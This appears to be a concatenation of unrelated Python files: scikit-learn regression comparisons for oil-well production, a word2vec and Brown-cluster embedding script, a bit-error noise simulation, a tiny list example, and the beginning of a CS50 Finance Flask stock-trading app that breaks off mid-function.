plt.savefig('Gillbert Correlation.png')
plt.close()
R2Score = r2_score(test_y*df2_filt[m:,2], Gillbert_test)
print('Score:', R2Score)
Correlation_Coefficient_Gilbert = np.corrcoef(test_y*df2_filt[m:,2], Gillbert_test)[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Gilbert)
# Features' Standardization
scaler = preprocessing.StandardScaler().fit(train_x)
train_x = scaler.transform(train_x)
test_x = scaler.transform(test_x)
# Linear Regression
Linreg = linear_model.LinearRegression()
Linreg.fit(train_x, train_y)
Coefficients = Linreg.coef_
Bias = Linreg.intercept_
# Make predictions using the testing set
Gross_pred = Linreg.predict(test_x)
# Plot outputs
plt.figure()
LinregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Linear Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Linreg = Linreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Linreg)
Test_Score_Linreg = Linreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Linreg)
Correlation_Coefficient_Linreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Linreg)
plt.savefig('Linear Resgression.png')
plt.close()
# Ridge Regression
Ridgreg = linear_model.Ridge(alpha=.5)
Ridgreg.fit(train_x, train_y)
Coefficients = Ridgreg.coef_
Bias = Ridgreg.intercept_
# Make predictions using the testing set
Gross_pred = Ridgreg.predict(test_x)
# Plot outputs
plt.figure()
RidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Ridge Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Ridgreg = Ridgreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Ridgreg)
Test_Score_Ridgreg = Ridgreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Ridgreg)
Correlation_Coefficient_Ridgreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Ridgreg)
plt.savefig('Ridge Resgression.png')
plt.close()
# Bayesian Regression
Bayreg = linear_model.BayesianRidge()
Bayreg.fit(train_x, train_y)
Coefficients = Bayreg.coef_
Bias = Bayreg.intercept_
# Make predictions using the testing set
Gross_pred = Bayreg.predict(test_x)
# Plot outputs
plt.figure()
BayregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Bayesian Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_Bayreg = Bayreg.score(train_x, train_y)
print('Train_Score:',Train_Score_Bayreg)
Test_Score_Bayreg = Bayreg.score(test_x, test_y)
print('Test_Score:',Test_Score_Bayreg)
Correlation_Coefficient_Bayreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_Bayreg)
plt.savefig('Bayesian Resgression.png')
plt.close()
# Polynomial Linear Regression
PolyLinreg = Pipeline([('poly', PolynomialFeatures(degree = 2)), ('linear', LinearRegression(fit_intercept=False))])
PolyLinreg.fit(train_x, train_y)
Coefficients = PolyLinreg.named_steps['linear'].coef_
# Make predictions using the testing set
Gross_pred = PolyLinreg.predict(test_x)
# Plot outputs
plt.figure()
PolyLinregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Linear Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_PolyLinreg = PolyLinreg.score(train_x, train_y)
print('Train_Score:',Train_Score_PolyLinreg)
Test_Score_PolyLinreg = PolyLinreg.score(test_x, test_y)
print('Test_Score:',Test_Score_PolyLinreg)
Correlation_Coefficient_PolyLinreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_PolyLinreg)
plt.savefig('Polynomial Linear Resgression.png')
plt.close()
# Polynomial Ridge Regression
BestAlpha = 0
BestScore = 0
BestDegree = 0
for i in range(0,5,1):
for j in range(1,5):
alpha = i/10
PolyRidgreg = Pipeline([('poly', PolynomialFeatures(degree = j)), ('linear', Ridge(alpha=alpha,fit_intercept=False))])
PolyRidgreg.fit(train_x, train_y)
Coefficients = PolyRidgreg.named_steps['linear'].coef_
#print(Coefficients)
# Make predictions using the testing set
Gross_pred = PolyRidgreg.predict(test_x)
Test_Score = PolyRidgreg.score(test_x, test_y)
if Test_Score>BestScore:
BestAlpha = alpha
BestScore = Test_Score
BestDegree = j
print(BestAlpha)
print(BestDegree)
print(BestScore)
PolyRidgreg = Pipeline([('poly', PolynomialFeatures(degree = BestDegree)), ('linear', Ridge(alpha=BestAlpha,fit_intercept=False))])
PolyRidgreg.fit(train_x, train_y)
Coefficients = PolyRidgreg.named_steps['linear'].coef_
#print(Coefficients)
# Make predictions using the testing set
Gross_pred = PolyRidgreg.predict(test_x)
# Plot outputs
plt.figure()
PolyRidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Ridge Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_PolyRidgreg = PolyRidgreg.score(train_x, train_y)
print('Train_Score:',Train_Score_PolyRidgreg)
Test_Score_PolyRidgreg = PolyRidgreg.score(test_x, test_y)
print('Test_Score:',Test_Score_PolyRidgreg)
Correlation_Coefficient_PolyRidgreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_PolyRidgreg)
plt.savefig('Polynomial Ridge Resgression.png')
plt.close()
# Multi Layer Perceptron Regression
MLPreg = MLPRegressor(hidden_layer_sizes = (10,),
activation = 'relu',
solver = 'adam',
learning_rate = 'constant',
max_iter = 1000,
learning_rate_init = 0.001,
alpha = 0.1)
MLPreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = MLPreg.predict(test_x)
# Plot outputs
plt.figure()
MLPregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Multi Layer Perceptron Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_MLPreg = MLPreg.score(train_x, train_y)
print('Train_Score:',Train_Score_MLPreg)
Test_Score_MLPreg = MLPreg.score(test_x, test_y)
print('Test_Score:',Test_Score_MLPreg)
Correlation_Coefficient_MLPreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_MLPreg)
plt.savefig('Multi Layer Perceptron Resgression.png')
plt.close()
# Nearest Neighbor Regression
neighReg = KNeighborsRegressor(n_neighbors=3, weights='uniform', algorithm='auto',
leaf_size=30, p=2, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(test_x)
# Plot outputs
plt.figure()
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_neighReg = neighReg.score(train_x, train_y)
print('Train_Score:',Train_Score_neighReg)
Test_Score_neighReg = neighReg.score(test_x, test_y)
print('Test_Score:',Test_Score_neighReg)
Correlation_Coefficient_neighReg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_neighReg)
plt.savefig('Nearest Neighbor Regression.png')
plt.close()
# Random Forrest Regression
RFreg = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=None,
min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(test_x)
# Plot outputs
plt.figure()
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forrest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_RFreg = RFreg.score(train_x, train_y)
print('Train_Score:',Train_Score_RFreg)
Test_Score_RFreg = RFreg.score(test_x, test_y)
print('Test_Score:',Test_Score_RFreg)
Correlation_Coefficient_RFreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_RFreg)
plt.savefig('Random Forrest Resgression.png')
plt.close()
# Gradient Tree Boosting Regression
GTBreg = GradientBoostingRegressor(n_estimators=100, learning_rate=0.01,
max_depth=10, random_state=0, loss='ls')
GTBreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = GTBreg.predict(test_x)
# Plot outputs
plt.figure()
GTBregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Gradient Tree Boosting')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_GTBreg = GTBreg.score(train_x, train_y)
print('Train_Score:',Train_Score_GTBreg)
Test_Score_GTBreg = GTBreg.score(test_x, test_y)
print('Test_Score:',Test_Score_GTBreg)
Correlation_Coefficient_GTBreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_GTBreg)
plt.savefig('Gradient Tree Boosting.png')
plt.close()
# Extra Trees Regression
XTreg = ExtraTreesRegressor(n_estimators=100, criterion='mse', max_depth=None,
min_samples_split=2, min_samples_leaf=1,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(test_x)
# Plot outputs
plt.figure()
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_XTreg = XTreg.score(train_x, train_y)
print('Train_Score:',Train_Score_XTreg)
Test_Score_XTreg = XTreg.score(test_x, test_y)
print('Test_Score:',Test_Score_XTreg)
Correlation_Coefficient_XTreg = np.corrcoef(test_y*df2_filt[m:,2], Gross_pred*df2_filt[m:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_XTreg)
plt.savefig('Extra Trees Resgression.png')
plt.close()
#plotting Results
fig = plt.figure()
fig.set_size_inches(20.5, 7, forward=True)
plt.subplot(2, 5, 1)
LinregPlot = plt.scatter(test_y*df2_filt[m:,2], Linreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Linear Regression')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 2)
RidgregPlot = plt.scatter(test_y*df2_filt[m:,2], Ridgreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Ridge Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 3)
BayregPlot = plt.scatter(test_y*df2_filt[m:,2], Bayreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Bayesian Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 4)
PolyLinregPlot = plt.scatter(test_y*df2_filt[m:,2], PolyLinreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Linear Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 5)
PolyRidgregPlot = plt.scatter(test_y*df2_filt[m:,2], PolyRidgreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Polynomial Ridge Regression')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 6)
MLPregPlot = plt.scatter(test_y*df2_filt[m:,2], MLPreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Multi Layer Perceptron Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 7)
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], RFreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forrest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 8)
GTBregPlot = plt.scatter(test_y*df2_filt[m:,2], GTBreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Gradient Tree Boosting')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 9)
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], neighReg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(2, 5, 10)
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], XTreg.predict(test_x)*df2_filt[m:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.savefig('All Results - All Data.png')
plt.close()
# Plotting Top-3 Models Results
fig = plt.figure()
fig.set_size_inches(12.3, 3.5, forward=True)
plt.subplot(1, 3, 1)
XTregPlot = plt.scatter(test_y*df2_filt[m:,2], XTreg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(1, 3, 2)
RFregPlot = plt.scatter(test_y*df2_filt[m:,2], RFreg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forrest Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.subplot(1, 3, 3)
neighRegPlot = plt.scatter(test_y*df2_filt[m:,2], neighReg.predict(test_x)*df2_filt[m:,2], color='green', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression')
plt.xlabel('Measured Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
plt.savefig('Top 3 - All Fields.png')
plt.close()
n = df2_filt.shape[0]
m = int(n * 0.8)
print(n)
v = int(n * 0.9)
Idx = [1,3,4,5,6,7,12,15]
train_y = df2_filt[:m,0]
train_x = df2_filt[:m,Idx]
test_y = df2_filt[m:v,0]
test_x = df2_filt[m:v,Idx]
valid_y = df2_filt[v:,0]
valid_x = df2_filt[v:,Idx]
# Extra Trees Regression Hyperparameter Tuning
BestEst = 0
BestScore = 0
BestSplit = 0
BestLeaf = 0
for i in range(100,150,10):
for j in range(2,4,1):
for k in range(1,3,1):
XTreg = ExtraTreesRegressor(n_estimators=i, criterion='mse', max_depth=None,
min_samples_split=j, min_samples_leaf=k,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(test_x)
Test_Score = XTreg.score(test_x, test_y)
if Test_Score>BestScore:
BestEst = i
BestScore = Test_Score
BestSplit = j
BestLeaf = k
print(BestEst)
print(BestSplit)
print(BestScore)
print(BestLeaf)
XTreg = ExtraTreesRegressor(n_estimators=BestEst, criterion='mse', max_depth=None,
min_samples_split=BestSplit, min_samples_leaf=BestLeaf,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=False, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
XTreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = XTreg.predict(valid_x)
# Plot outputs
plt.figure()
XTregPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Extra Trees Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_XTreg = XTreg.score(train_x, train_y)
print('Train_Score:',Train_Score_XTreg)
Test_Score_XTreg = XTreg.score(test_x, test_y)
print('Test_Score:',Test_Score_XTreg)
Valid_Score_XTreg = XTreg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_XTreg)
Correlation_Coefficient_XTreg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_XTreg)
plt.savefig('Extra Trees Resgression Hyper Tuned.png')
plt.close()
# Random Forest Regression Hyperparameter Tuning
BestEst = 0
BestScore = 0
BestSplit = 0
BestLeaf = 0
for i in range(100,150,10):
for j in range(2,5,1):
for k in range(1,5,1):
RFreg = RandomForestRegressor(n_estimators=i, criterion='mse', max_depth=None,
min_samples_split=j, min_samples_leaf=k,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(test_x)
Test_Score = RFreg.score(test_x, test_y)
if Test_Score>BestScore:
BestEst = i
BestScore = Test_Score
BestSplit = j
BestLeaf = k
print(BestEst)
print(BestSplit)
print(BestScore)
print(BestLeaf)
RFreg = RandomForestRegressor(n_estimators=BestEst, criterion='mse', max_depth=None,
min_samples_split=BestSplit, min_samples_leaf=BestLeaf,
min_weight_fraction_leaf=0.0, max_features='auto',
max_leaf_nodes=None, min_impurity_decrease=0.0,
min_impurity_split=None, bootstrap=True, oob_score=False,
n_jobs=None, random_state=None, verbose=0, warm_start=False)
RFreg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = RFreg.predict(valid_x)
# Plot outputs
plt.figure()
RFregPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Random Forrest Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_RFreg = RFreg.score(train_x, train_y)
print('Train_Score:',Train_Score_RFreg)
Test_Score_RFreg = RFreg.score(test_x, test_y)
print('Test_Score:',Test_Score_RFreg)
Valid_Score_RFreg = RFreg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_RFreg)
Correlation_Coefficient_RFreg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_RFreg)
plt.savefig('Random Forrest Regression Hyper Tuned.png')
plt.close()
# Nearest Neighbor Regression Hyperparameter Tuning
Bestneigh = 0
BestScore = 0
BestLeaf = 0
BestP = 0
for i in range(2,10,1):
for j in range(30,70,10):
for k in range(2,5,1):
neighReg = KNeighborsRegressor(n_neighbors=i, weights='uniform', algorithm='auto',
leaf_size=j, p=k, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(test_x)
Test_Score = neighReg.score(test_x, test_y)
if Test_Score>BestScore:
Bestneigh = i
BestScore = Test_Score
BestLeaf = j
BestP = k
print(Bestneigh)
print(BestScore)
print(BestLeaf)
print(BestP)
neighReg = KNeighborsRegressor(n_neighbors=Bestneigh, weights='uniform', algorithm='auto',
leaf_size=BestLeaf, p=BestP, metric='minkowski',
metric_params=None, n_jobs=None)
neighReg.fit(train_x, train_y)
# Make predictions using the testing set
Gross_pred = neighReg.predict(valid_x)
# Plot outputs
plt.figure()
neighRegPlot = plt.scatter(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2], color='blue', linewidth=1)
plt.plot([0, ymax], [0, ymax], color = 'red', linewidth = 2)
plt.title('Nearest Neighbor Regression Hyper Tuned')
plt.xlabel('Measured Gross (bbl/Day)')
plt.ylabel('Predicted Gross (bbl/Day)')
plt.xlim((0, ymax))
plt.ylim((0, ymax))
Train_Score_neighReg = neighReg.score(train_x, train_y)
print('Train_Score:',Train_Score_neighReg)
Test_Score_neighReg = neighReg.score(test_x, test_y)
print('Test_Score:',Test_Score_neighReg)
Valid_Score_neighReg = neighReg.score(valid_x, valid_y)
print('Valid_Score:',Valid_Score_neighReg)
Correlation_Coefficient_neighReg = np.corrcoef(valid_y*df2_filt[v:,2], Gross_pred*df2_filt[v:,2])[1,0]
print('Correlation_Coefficient:',Correlation_Coefficient_neighReg)
plt.savefig('Nearest Neighbor Regression Hyper Tuned.png')
plt.close()
|
#square each ele and store in other lst
nums = [1,2,3,4,5,6,7,8,9]
lst=[]
for num in nums:
lst.append(num*num)
print(lst)
|
import gensim
import numpy as np
import pandas as pd
from ..util import defines
from ..util import file_handling as fh
def main():
input_filename = fh.make_filename(defines.data_token_dir, 'ngrams_1_rnn_all', 'json')
response_tokens = fh.read_json(input_filename)
print "Building token set"
token_set = set()
for r in response_tokens:
token_set.update(response_tokens[r])
all_tokens = list(token_set)
print len(token_set), "tokens"
print "Loading brown clusters"
brown_cluster_filename = fh.make_filename(defines.vectors_dir, 'brown_vectors', 'json')
brown_clusters_data = fh.read_json(brown_cluster_filename)
print brown_clusters_data.keys()
brown_index = brown_clusters_data['index']
brown_vectors = brown_clusters_data['vectors']
brown_counts = brown_clusters_data['counts']
print "Inverting brown cluster index"
# invert the brown cluster index
brown_clusters = {}
for word in brown_index.keys():
code = brown_index[word]
if code in brown_clusters:
brown_clusters[code].append(word)
else:
brown_clusters[code] = [word]
# Load word2vec vectors
print "Loading vectors"
vector_file = defines.word2vec_vectors_filename
word2vec_vectors = gensim.models.Word2Vec.load_word2vec_format(vector_file, binary=True)
print "Computing weighted mean for unknown words"
# get weighted average vector for each cluster, based on its elements that have word2vec vectors
word2vec_dim = 300
mean_vectors = {}
for code in brown_clusters.keys():
vector = np.zeros(word2vec_dim)
count = 0
total_weight = 0
for word in brown_clusters[code]:
if word in word2vec_vectors:
weight = int(brown_counts[word])
vector += word2vec_vectors[word] * weight
count += 1
total_weight += weight
if count > 0:
vector /= float(total_weight)
else:
print code, "has no representatives in word2vec"
mean_vectors[code] = vector
print "Creating dictionary of final vectors"
final_vectors = pd.DataFrame(np.zeros([len(all_tokens), word2vec_dim]), index=all_tokens)
for word in all_tokens:
if word in word2vec_vectors:
final_vectors.loc[word] = word2vec_vectors[word]
elif word in brown_index:
final_vectors.loc[word] = mean_vectors[brown_index[word]]
print "Saving to file"
output_filename = fh.make_filename(defines.vectors_dir, 'brown_augmented_word2vec_300', 'csv')
final_vectors.to_csv(output_filename, header=False)
if __name__ == '__main__':
main()
|
#Szum.py
import numpy as nm
import matplotlib.pyplot as plt
def error_calc(lengthdata, noise_amp):
b = nm.random.uniform(-1, 1, lengthdata)
signal = nm.zeros(lengthdata,float)
for i in range(len(b)):
if b[i] < 0:
signal[i] = -1
else:
signal[i]=1
noise = nm.random.randn(lengthdata)
rec_signal =signal + noise_amp *noise
detected_signal = nm.zeros(lengthdata,float)
for i in range(len(b)):
if rec_signal[i] < 0:
detected_signal[i]= -1
else:
detected_signal[i]=1
error_matrix = abs((detected_signal - signal)/2)
error = error_matrix.sum()
return error
|
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session, url_for
from flask_session import Session
from passlib.apps import custom_app_context as pwd_context
from tempfile import gettempdir
import os
from helpers import *
# configure application
app = Flask(__name__)
# ensure responses aren't cached
if app.config["DEBUG"]:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# custom filter
app.jinja_env.filters["usd"] = usd
# configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = gettempdir()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
app.secret_key = os.urandom(24)
@app.route("/")
@login_required
def index():
rows_portfolio = db.execute("SELECT symbol, company, SUM(shares) AS shares FROM portfolio WHERE id = :id GROUP BY company", id = session["user_id"])
total = 0
for row in range(len(rows_portfolio)):
rows_portfolio[row]["price"] = usd(lookup(rows_portfolio[row]["symbol"])["price"])
rows_portfolio[row]["total"] = usd(lookup(rows_portfolio[row]["symbol"])["price"] * rows_portfolio[row]["shares"])
total += lookup(rows_portfolio[row]["symbol"])["price"] * rows_portfolio[row]["shares"]
#deletes rows in rows_portfolio if there are 0 shares for that company
new_row = []
for row in range(len(rows_portfolio)):
if rows_portfolio[row]["shares"] != 0:
new_row.append(rows_portfolio[row])
user = db.execute("SELECT cash FROM users WHERE id = :id", id = session["user_id"])
cash = user[0]["cash"]
total += cash
total = usd(total)
cash = usd(cash)
return render_template("index.html", portfolio = new_row, cash = cash, total = total)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock."""
if request.method == "POST":
#ensures proper usage
symbol = request.form.get("symbol")
if symbol == "":
return apology("Please Enter a Symbol")
elif lookup (symbol) == None:
return apology("Sorry stock not found")
elif request.form.get("shares") == None:
return apology("Please Enter Number of Shares")
elif RepresentsInt(request.form.get("shares")) == False:
return apology("Invalid input")
elif int(request.form.get("shares")) <= 0:
return apology("Please enter a positive number")
else:
row = db.execute("SELECT * FROM users WHERE id = :id", id = session["user_id"])
cash = row[0]["cash"]
price = lookup(request.form.get("symbol"))["price"]
company = lookup(request.form.get("symbol"))["name"]
shares = int(request.form.get("shares"))
symbol = lookup(symbol)["symbol"]
if shares * price <= cash:
db.execute("INSERT INTO portfolio (id, company, price, shares, symbol) VALUES (:id, :company, :price, :shares, :symbol )", id = session["user_id"], company = company, price = price, shares = shares, symbol = symbol)
cash -= price * shares
db.execute("UPDATE users SET cash =:cash WHERE id = :id", cash = cash, id = session["user_id"])
return redirect(url_for("index"))
else:
